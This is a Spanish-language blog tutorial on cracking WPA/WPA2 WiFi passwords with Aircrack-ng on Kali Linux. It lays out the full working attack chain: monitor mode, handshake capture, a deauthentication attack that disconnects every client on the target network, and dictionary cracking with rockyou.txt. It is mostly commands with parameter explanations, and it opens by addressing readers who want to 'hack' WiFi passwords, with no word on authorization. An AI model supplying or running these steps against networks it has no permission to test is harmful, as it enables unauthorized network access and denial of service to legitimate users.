¿Buscabas hackear contraseñas WiFi? En esta guía vamos a poner a prueba la fuerza de una contraseña WiFi con Aircrack-ng.
Veremos un método clásico para crackear la contraseña o clave de una red inalámbrica. Todas las herramientas utilizan este método de una manera u otra. Veamos cómo usar Aircrack-ng.
En este artículo de hacking nos centraremos en el uso de las herramientas de Kali Linux para probar la fuerza de las claves de redes inalámbricas (WiFi) al tratar de romper directamente la contraseña. ¿Por qué decimos cracking de contraseñas? porque el Password cracking es el proceso de recuperación de contraseñas.
En los últimos años, las redes WiFi han recorrido un largo camino y siempre que su red esté usando el cifrado WPA2-AES, una contraseña fuerte, y tiene el WPS deshabilitado será extremadamente difícil de acceder. Hey! vamos a intentarlo
Un método para hackear las contraseñas cifradas de Wi-Fi es mediante la fuerza bruta, por lo que cada combinación de caracteres se intenta hasta que llegue a la correcta. Es teóricamente posible, pero esto puede tomar años en la práctica, especialmente si se utiliza una contraseña larga.
Kali incluye la suite de herramientas aircrack-ng, que puede ser utilizada por los hackers para acelerar este proceso considerablemente. Esto se hace generalmente intentando con una listas de palabras pre-compiladas que contienen contraseñas predeterminadas y comunes, así como forzando a los dispositivos a volver a autenticarse para que pueda capturar el procedimiento crucial: handshake, donde la clave del WiFi se intercambia con el router.
1. Pasos para Descifrar Contraseñas WiFi con Aircrack-Ng
Por supuesto para empezar se necesita tener una tarjeta inalámbrica. Además, contar con una distribución como Kali Linux. Una vez que tenga esto, empezamos a intentar “hackear” contraseñas WiFi.
- Compruebe que Kali puede detectar el adaptador abriendo la terminal y ejecutando el comando:
airmon-ng
- Deshabilite cualquier proceso que pueda interferir con su captura de paquetes, escriba el siguiente comando:
airmon-ng check kill
- Ahora ponga el adaptador en modo de monitoreo con el comando:
airmon-ng start wlan0
- Anote el nombre de la interfaz y ejecute airodump-ng <nombre de la interfaz> para listar las redes que le rodean, por ejemplo:
//Ejecute el siguiente comando
//para empezar a escuchar todas las conexiones WiFi disponibles
airodump-ng wlan0mon
1.2. Encontrando la Red WiFi Objetivo
- Encuentre en la lista, la red que tiene como objetivo descifrar su contraseña. Anote el “BSSID” y “CH” (Canal). Verá algo parecido a:
- A continuación, después de haber visto su objetivo presione las teclas Ctrl+C y ejecute el comando:
airodump-ng -c 6 –-bssid 02:08:22:7E:B7:6F --write EsGeeks wlan0mon
Parámetro | Descripción |
-c: | Es número del canal de la red que aparece en la columna CH (En la salida de la pantalla anterior). En mi caso es 6. |
–bssid: | Es la dirección MAC de la red objetivo. En mi caso es EsGeeks y el BSSID es 02:08:22:7E:B7:6F |
–write: | Es el archivo de captura en la que se guardarán los paquetes. En mi caso la he nombrado como “EsGeeks”. |
-w: | Es el prefijo del nombre de archivo que contendrá el handshake |
wlan0mon: | La interfaz inalámbrica |
1.3. Lanzando un ataque deauth
- Ahora abrimos una nueva terminal e iniciamos el ataque deauth para desconectar todos los clientes conectados a la red. Ésto le ayudará en la captura del handshake. Ingrese el comando:
aireplay-ng -0 10 –a 02:08:22:7E:B7:6F -e EsGeeks wlan0mon
Parámetro | Descripción |
-0: | Se utiliza para el ataque deauth. |
10: | Es el número de paquetes deauth para ser enviados. |
-a: | Es la dirección MAC de la red WiFi objetivo. |
-e: | Es el ESSID de la red objetivo, es decir, su nombre. |
- Después de lanzar el ataque deauth y conseguir el HANDSHAKE WPA, pulse Ctrl+C .
1.4. Descifrando Claves WiFi por Fuerza Bruta
- Ahora tenemos que romper la clave con aircrack-ng, escriba el comando:
aircrack-ng EsGeeks-01.cap -w rockyou.txt
Parámetro | Descripción |
EsGeeks-01.cap: | Es el archivo de captura que generamos en el airodump-ng. (puede ejecutar el comando “ls” para mostrar el nombre exacto de su archivo de registro) |
-w: | Es el diccionario que se utilizará para llevar a cabo el ataque de fuerza bruta. |
En mi caso, la clave se ha encontrado! Key Found! [12345678]
Por supuesto, si la clave es del tipo de la imagen anterior, la herramienta la descifrará en un instante. Mientras más compleja sea la contraseña, mayor será el tiempo de dar con ella. ¿Cómo puedes acelerar el proceso? con un buen diccionario…
El craqueo de contraseñas requiere una lista de palabras. Puede descargar uno o extraer el archivo rockyou.txt.gz que se encuentra en /usr/share/wordlists/ en Kali. Hay otra lista en la siguiente ruta: /usr/share/nmap/nselib/data/passwords.lst
2. Vídeo: Hackear Contraseñas WiFi con Aircrack-ng – Kali Linux
El siguiente vídeo muestra los pasos anteriores en ejecución. Mira cómo usar Aircrack-ng para descifrar claves WiFi (WPA/WPA2) con Kali Linux.
Hasta aquí hemos visto cómo usar Aircrack-ng para el cracking de contraseñas WiFi. Si te ha gustado el artículo, por favor, compártelo
Si tienes alguna duda, alguna experiencia o crees que me he equivocado en algún aspecto puedes comentarlo en la sección de abajo.
0 comentarios: